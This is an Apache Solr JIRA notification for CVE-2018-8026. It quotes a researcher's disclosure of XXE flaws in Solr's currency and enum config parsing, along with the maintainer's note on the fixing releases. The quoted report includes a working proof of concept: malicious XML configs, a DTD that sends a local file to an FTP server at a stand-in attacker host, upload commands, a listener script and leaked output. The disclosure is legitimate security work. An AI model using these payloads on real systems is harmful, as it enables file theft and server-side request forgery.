[
https://issues.apache.org/jira/browse/SOLR-12450?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16532934#comment-16532934
]
Uwe Schindler commented on SOLR-12450:
--------------------------------------
Releases 7.4.0 and 6.6.5 of Apache Solr are fixing this issue.
To prevent this problem in the future, I will open a separate issue to actually
put DocumentBuilder & Co. on the forbidden APIs list. This involves API changes
around Config class, so this was delayed to the next major release.
> CVE-2018-8026: More XXE vulns in code using DocumentBuilder
> -----------------------------------------------------------
>
> Key: SOLR-12450
> URL: https://issues.apache.org/jira/browse/SOLR-12450
> Project: Solr
> Issue Type: Bug
> Security Level: Public(Default Security Level. Issues are Public)
> Components: security
> Affects Versions: 6.6.4, 7.3.1
> Reporter: Uwe Schindler
> Assignee: Uwe Schindler
> Priority: Major
> Fix For: 6.6.5, 7.4
>
> Attachments: SOLR-12450.patch, SOLR-12450.patch, SOLR-12450.patch,
> SOLR-12450.patch
>
>
> From: yuyang xiao <superxyy...@gmail.com>
> Date: Mon, Jun 4, 2018 at 10:22 AM
> Subject: XXE vulns in lucene-solr
> To: secur...@apache.org
> Title: XXE vulns in lucene-solr
> Author: XiaoXiong , superxyy...@gmail.com
> Date: 2018-06-04
> Download Site: http://www.apache.org/dyn/closer.lua/lucene/solr/7.3.1
> Vulnerability:
> Recently, I found there are two another XXE Vulnerabilities. unsecure
> DocumentBuilderFactory is being used to parse currency.xml and
> enumsConfig.xml .
> I think the problem is as serious as CVE-2018-8010, It can result in reading
> any file and server side request forgery attack .I think it a dangerous
> vulnerability that you should limit the xml entity parse.
>
> The location of vulnerability one :
> https://github.com/apache/lucene-solr/blob/master/solr/core/src/java/org/apache/solr/schema/FileExchangeRateProvider.java
> {code:java}
> is = loader.openResource(currencyConfigFile);
> javax.xml.parsers.DocumentBuilderFactory dbf =
> DocumentBuilderFactory.newInstance();
> try {
> dbf.setXIncludeAware(true);
> dbf.setNamespaceAware(true);
> } catch (UnsupportedOperationException e) {
> throw new SolrException(SolrException.ErrorCode.BAD_REQUEST, "XML parser
> doesn't support XInclude option", e);
> }
>
> Document doc = dbf.newDocumentBuilder().parse(is);
> {code}
>
> the another xxe vulnerability
> https://github.com/apache/lucene-solr/blob/master/solr/core/src/java/org/apache/solr/schema/AbstractEnumField.java
> {code:xml}
> is = schema.getResourceLoader().openResource(enumsConfigFile);
> final DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
> final Document doc = dbf.newDocumentBuilder().parse(is);
> final XPathFactory xpathFactory = XPathFactory.newInstance();
> final XPath xpath = xpathFactory.newXPath();
> {code}
> The following is the vulnerability detail:
> Detail
> FileExchangeRateProvider Vulnerability
> environment:
> victim :
> Solr version: solr 7.3.1 OS: windows 7 java version "1.8.0_101"IP: victim_ip
> attacker:
> OS: kaliIP: attacker_ip
> Step 1: Create configeset with three files in directory called "test"
> schema.xml: import the currency handler
> {code:xml}
> <schema name="test" version="1.1"> <fieldType name="string"
> class="solr.StrField"/> <fieldType name="currency"
> class="solr.CurrencyField" precisionStep="8" defaultCurrency="USD"
> currencyConfig="currency.xml" /></schema>
> {code}
> currency.xml: import the attack payload
> {code:xml}
> <?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM
> "http://attacker_ip:9000/xxe.dtd";> %remote; ]> <currencyConfig
> version="1.0"> <rates> <!-- Updated from http://www.exchangerate.com/ at
> 2011-09-27 --> <rate from="USD" to="ARS" rate="4.333871"
> comment="ARGENTINA Peso" /> <rate from="USD" to="AUD" rate="1.025768"
> comment="AUSTRALIA Dollar" /> <rate from="USD" to="EUR" rate="0.743676"
> comment="European Euro" /> <rate from="USD" to="CAD" rate="1.030815"
> comment="CANADA Dollar" /> <!-- Cross-rates for some common currencies
> --> <rate from="EUR" to="GBP" rate="0.869914" /> <rate from="EUR"
> to="NOK" rate="7.800095" /> <rate from="GBP" to="NOK" rate="8.966508" />
> <!-- Asymmetrical rates --> <rate from="EUR" to="USD" rate="0.5" />
> </rates></currencyConfig>
> {code}
> solrconfig.xml: normal config file
> {code:xml}
> <config> <dataDir>${solr.data.dir:}</dataDir> <directoryFactory
> name="DirectoryFactory"
> class="${solr.directoryFactory:solr.NRTCachingDirectoryFactory}"/>
> <schemaFactory class="ClassicIndexSchemaFactory"/>
> <luceneMatchVersion>7.3.1</luceneMatchVersion> <updateHandler
> class="solr.DirectUpdateHandler2"> <commitWithin>
> <softCommit>${solr.commitwithin.softcommit:true}</softCommit>
> </commitWithin> </updateHandler> <requestHandler name="/select"
> class="solr.SearchHandler"> <lst name="defaults"> <str
> name="echoParams">explicit</str> <str name="indent">true</str> <str
> name="df">text</str> <str name="password">passwdFile</str> </lst>
> </requestHandler></config>
> {code}
> Step 2: Upload the test directory to Solr using configset upload API:
> {noformat}
> (cd test && zip -r - *) | curl -X POST --header
> "Content-Type:application/octet-stream" --data-binary @-
> "http://victim_ip:8983/solr/admin/configs?action=UPLOAD&name=configset1";
> {noformat}
> Step3: ready the xxe.dtd
> for Solr server read xxe.dtd
> python -m SimpleHTTPServer 9000
> xxe.dtd:
> {code:xml}
> <!ENTITY % file SYSTEM "file:///C:/Windows/win.ini"><!ENTITY % int "<!ENTITY
> % send SYSTEM 'ftp://user:12345@attacker_ip:2121/%file;/'>">%int;%send;
> {code}
> Step4: build the listening with ftp
> python ftpserver.py >> ./ftpserver.log 2>&1 &
> ftpserver.py:
> {noformat}
> import osfrom pyftpdlib.authorizers import DummyAuthorizerfrom
> pyftpdlib.handlers import FTPHandlerfrom pyftpdlib.servers import FTPServer
> def main(): # Instantiate a dummy authorizer for managing 'virtual' users
> authorizer = DummyAuthorizer() # Define a new user having full r/w
> permissions and a read-only # anonymous user
> authorizer.add_user('user', '12345', '.', perm='elradfmwMT')
> authorizer.add_anonymous(os.getcwd(), perm='elradfmwMT') # Instantiate
> FTP handler class handler = FTPHandler handler.authorizer = authorizer
> # Define a customized banner (string returned when client connects)
> handler.banner = "pyftpdlib based ftpd ready." # Instantiate FTP server
> class and listen on 0.0.0.0:2121 address = ('', 2121) server =
> FTPServer(address, handler) # set a limit for connections
> server.max_cons = 256 server.max_cons_per_ip = 5 # start ftp server
> server.serve_forever() if __name__ == '__main__': main()
> {noformat}
> Step5: Create a collection using this configset. and the file is revealed
> input the url
> http://victim_ip:8983/solr/admin/collections?action=CREATE&name=mybadcoll&numShards=1&collection.configName=configset1";
> read the error response
> {noformat}
> { "responseHeader":{ "status":0, "QTime":32895}, "failure":{
> "victim_ip:7574_solr":"org.apache.solr.client.solrj.impl.HttpSolrClient$RemoteSolrException:Error
> from server at http://victim_ip:7574/solr: Error CREATEing SolrCore
> 'mybadcoll_shard1_replica_n1': Unable to create core
> [mybadcoll_shard1_replica_n1] Caused by: CWD ; for 16-bit app
> support\n[fonts]\n[extensions]\n[mci
> extensions]\n[files]\n[Mail]\nMAPI=1\nCMCDLLNAME32=mapi32.dll\nCMC=1\nMAPIX=1\nMAPIXVER=1.0.0.1\nOLEMessaging=1\n[MCI
>
> Extensions.BAK]\n3g2=MPEGVideo\n3gp=MPEGVideo\n3gp2=MPEGVideo\n3gpp=MPEGVideo\naac=MPEGVideo\nadt=MPEGVideo\nadts=MPEGVideo\nm2t=MPEGVideo\nm2ts=MPEGVideo\nm2v=MPEGVideo\nm4a=MPEGVideo\nm4v=MPEGVideo\nmod=MPEGVideo\nmov=MPEGVideo\nmp4=MPEGVideo\nmp4v=MPEGVideo\nmts=MPEGVideo\nts=MPEGVideo\ntts=MPEGVideo\n:550
> File name too long.\n"}}
> {noformat}
> AbstractEnumField Vulnerability
> The process is the same with FileExchangeRateProvider under certain
> circumstance
> schema.xml:
> {code:xml}
> <schema name="test1" version="1.1"> <fieldType name="string"
> class="solr.StrField"/> <fieldType name="priorityLevel"
> class="solr.EnumFieldType" docValues="true" enumsConfig="enumsConfig.xml"
> enumName="priority"/> <fieldType name="riskLevel"
> class="solr.EnumFieldType" docValues="true" enumsConfig="enumsConfig.xml"
> enumName="risk" /></schema>
> {code}
> enumsConfig.xml
> {code:xml}
> <?xml version="1.0" ?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM
> "http://attacker_ip:9000/xxe.dtd";> %remote;]> <enumsConfig> <enum
> name="priority"> <value>Not Available</value> <value>Low</value>
> <value>Medium</value> <value>High</value> <value>Urgent</value>
> </enum> <enum name="risk"> <value>Unknown</value> <value>Very
> Low</value> <value>Low</value> <value>Medium</value>
> <value>High</value> <value>Critical</value> </enum></enumsConfig>
> {code}
--
This message was sent by Atlassian JIRA
(v7.6.3#76005)
---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org
